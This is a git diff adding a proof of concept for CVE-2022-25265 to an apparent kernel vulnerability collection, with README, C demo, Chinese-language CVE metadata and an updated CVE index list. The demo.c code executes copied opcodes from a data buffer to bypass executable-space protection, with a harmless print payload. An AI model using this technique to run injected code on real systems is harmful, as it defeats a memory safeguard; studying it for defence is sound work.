diff --git a/cve/linux-kernel/2022/CVE-2022-25265/LICENSE b/cve/linux-kernel/2022/CVE-2022-25265/LICENSE new file mode 100644 index 0000000000000000000000000000000000000000..6aa9d5ecfc7aa4e7626ce744fce56cfc99833a94 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-25265/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2022 x0reaxeax + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/cve/linux-kernel/2022/CVE-2022-25265/README.md b/cve/linux-kernel/2022/CVE-2022-25265/README.md new file mode 100644 index 0000000000000000000000000000000000000000..520df8195a1544ef58a72e2d25b0a6062c6fc849 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-25265/README.md @@ -0,0 +1,28 @@ +# Executable Space Protection Bypass (CVE-2022-25265) + +This POC demonstrates execution of bytes located in supposedly non-executable region of binary, therefore completely bypassing executable-space protection. + +The root cause of this can be found here: +https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/elf.h#L280 + +## Brief +As it turns out, binary files built on either systems lacking NX or IA32 systems with NX, which do NOT contain the `PT_GNU_STACK` header will be marked with `exec-all`. +This allows for complete RWX to/from everywhere in the binary. + + +To achieve this, we use "historical" building tools. +In this case, gcc 3.2.2 running on x86 Slackware9 with Linux 2.4.20 +We will end up with a binary file which can be executed on modern Linux systems, in this case **Linux 5.16.1** + +The very same effect MIGHT be achievable with specific linker arguments/scripts, although I have NOT verified this. + +The following code will copy assembled bytes of function `dummy()` to character array `harmless_str_buf` and execute the destination array as function. + +[Demo with reverse shell](https://youtu.be/zj5z7eB_frk) + +# *** DISCLAIMER *** +This demonstration serves completely for educational purposes. +Under no circumstances can the author of this code be held responsible +for any direct or indirect damage caused by misusing any provided code and/or information. + +See [LICENSE](https://github.com/x0reaxeax/exec-prot-bypass/blob/main/LICENSE) for more details diff --git a/cve/linux-kernel/2022/CVE-2022-25265/demo.c b/cve/linux-kernel/2022/CVE-2022-25265/demo.c new file mode 100644 index 0000000000000000000000000000000000000000..b2380f8aef2610b2e261f7b3692b1c13c6851586 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-25265/demo.c @@ -0,0 +1,118 @@ +/** + * @file demo.c + * @author x0reaxeax + * @brief executable-space protection bypass POC + * @date 2022-02-16 + * + * @copyright Copyright (c) x0reaxeax 2022 + * + * This POC demonstrates execution of bytes + * located in supposedly non-executable region of binary, + * therefore completely bypassing executable-space protection. + * + * The root cause of this can be found here: + * https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/elf.h#L280 + * + * As it turns out, binary files built on either + * systems lacking NX or IA32 systems with NX, + * which do NOT contain the `PT_GNU_STACK` header + * will be marked with `exec-all`. + * + * This allows complete for RWX to/from everywhere in the binary. + * + * To achieve this, we use "historical" building tools. + * In this case, gcc 3.2.2 running on x86 Slackware9 with Linux 2.4.20 + * We will end up with a binary file which we can run on modern Linux + * systems, in this case Linux 5.16.1 + * + * Building: + * + * `gcc -nostdlib -o demo32 demo.c` + * + * The following code will copy assembled bytes of function `dummy()` + * to character array `harmless_str_buf` and execute the destination array as function. + * + * + * *** DISCLAIMER *** + * This demonstration serves completely for educational purposes. + * Under no circumstances can the author of this code be held responsible + * for any direct or indirect damage caused by misusing provided code and/or information. + + * MIT License + * + * Copyright (c) 2022 x0reaxeax + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. +*/ + +#define NULL ((void *) 0) +#define POC + +#define BUFSIZE 128 + +char str[] = "noexec bypassed!\n"; + +/** + * This buffer will be loaded with dummy()'s opcodes +*/ +char harmless_str_buf[BUFSIZE] = "xrandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomdatarandomx"; + +/** + * dummy function - target shellcode + * opcodes of this function will be copied to harmless_str_buf. + * included for ease of POC demonstration +*/ +void dummy(void) { + __asm__ volatile ( + ".intel_syntax noprefix;" + "mov eax, 4;" /* sys_write */ + "mov ebx, 1;" /* stdout */ + "mov ecx, %[str];" + "mov edx, 17;" /* strlen */ + "int 0x80;" /* syscall */ + "int3;" /* boundary */ + ".att_syntax;" + :: [str] "r" (str) + : "eax", "ebx", "ecx", "edx" + ); +} + +/** + * copies opcodes from `dummy()` to destination buf +*/ +void (*copy_opcodes(unsigned char *output, unsigned int bufsiz)) (void) { + unsigned int i = 0; + unsigned char *dummy_ptr = (unsigned char *) dummy; + for (i = 0; i < bufsiz; i++) { + unsigned char opcode = *(dummy_ptr + i); + output[i] = opcode; + + if (opcode == 0xcc) { + /* boundary hit */ + break; + } + } + + return (void (*)()) output; +} + +int _start(void) { +#ifdef POC /* execute opcodes in harmless_str_buf */ + void (*pfunc)() = NULL; + + pfunc = copy_opcodes(harmless_str_buf, BUFSIZE); + pfunc(); +#else /* execute dummy() to demonstrate it's purpose */ + dummy(); +#endif + + return 0; /* segfault */ +} diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml new file mode 100644 index 0000000000000000000000000000000000000000..d64f2726bf2bef6aa76afd6d322193884ab2515a --- /dev/null +++ b/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml @@ -0,0 +1,19 @@ +id: CVE-2022-25265 +source: https://github.com/x0reaxeax/exec-prot-bypass +info: + name: Linux kernel是Linux操作系统的主要组件,也是计算机硬件与其进程之间的核心接口。它负责两者之间的通信,还要尽可能高效地管理资源。Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用。 + severity: high + description: | + 在截至Linux 5.16.10的内核中,如果某些二进制文件是在2003年左右建立的(例如,使用GCC 3.2.2和Linux内核2.4.20),那么它们可能具有exec-all属性。这可能导致位于文件中所谓的不可执行区域的字节被执行。 + scope-of-influence: + Linux 5.16.10以前的所有版本 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2022-25265 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2022-25265 + cwe-id: CWE-913 + cnvd-id: none + kve-id: none + tags: Linux kernel, 内存损坏 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index f822acc2b69f179a6e97f17564d06e258e4fe60d..37ac13ed01e3fb308a303b008661d074dc71201a 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -6,12 +6,24 @@ cve: - CVE-2021-42013 apache-APISIX: - CVE-2022-24112 + apache-CouchDB: + - CVE-2022-24706 apache-solr: - CVE-2021-27905 + apache-tomcat: + - CVE-2022-29885 + - CVE-2020-9484 + apache-Spark: + - CVE-2022-33891 + apache-tomcat: + - CVE-2020-13935 linux-kernel: - CVE-2021-4204 - CVE-2021-22555 + - CVE-2021-4154 + - CVE-2021-3490 - CVE-2022-34918 + - CVE-2022-25265 - CVE-2022-2639 - CVE-2022-0847 - CVE-2022-23222 @@ -20,16 +32,24 @@ cve: - CVE-2022-0492 - CVE-2022-2588 - CVE-2022-25636 + - CVE-2022-1679 - CVE-2022-25258 - CVE-2023-0045 - CVE-2022-32250 - CVE-2022-27666 + - CVE-2021-41073 + - CVE-2022-0435 + - CVE-2021-26708 sudo: - CVE-2021-3156 - CVE-2023-22809 gitlab: - CVE-2021-22205 + - CVE-2021-22214 - CVE-2022-1162 + - CVE-2022-2992 + - CVE-2022-2185 + - CVE-2022-2884 confluence: - CVE-2019-3396 - CVE-2021-26084 @@ -37,6 +57,7 @@ cve: polkit: - CVE-2021-4034 vim: + - CVE-2021-3778 - CVE-2022-0351 - CVE-2022-0359 - CVE-2022-0413 @@ -51,16 +72,21 @@ cve: - CVE-2022-2257 - CVE-2022-2264 - CVE-2022-2598 + - CVE-2023-0433 openssl: - CVE-2022-1292 - CVE-2022-2274 - CVE-2022-3602 - CVE-2023-25136 + - CVE-2021-3449 + - CVE-2022-0778 libxml2: - CVE-2020-24977 - CVE-2021-3517 - CVE-2021-3518 - CVE-2021-3537 + redis: + - CVE-2022-31144 cnvd: kve: kylin-software-properties: @@ -71,4 +97,4 @@ kve: kylin-display-switch: - KVE-2022-0206 kylin-activation: - - KVE-2022-0231 + - KVE-2022-0231 \ No newline at end of file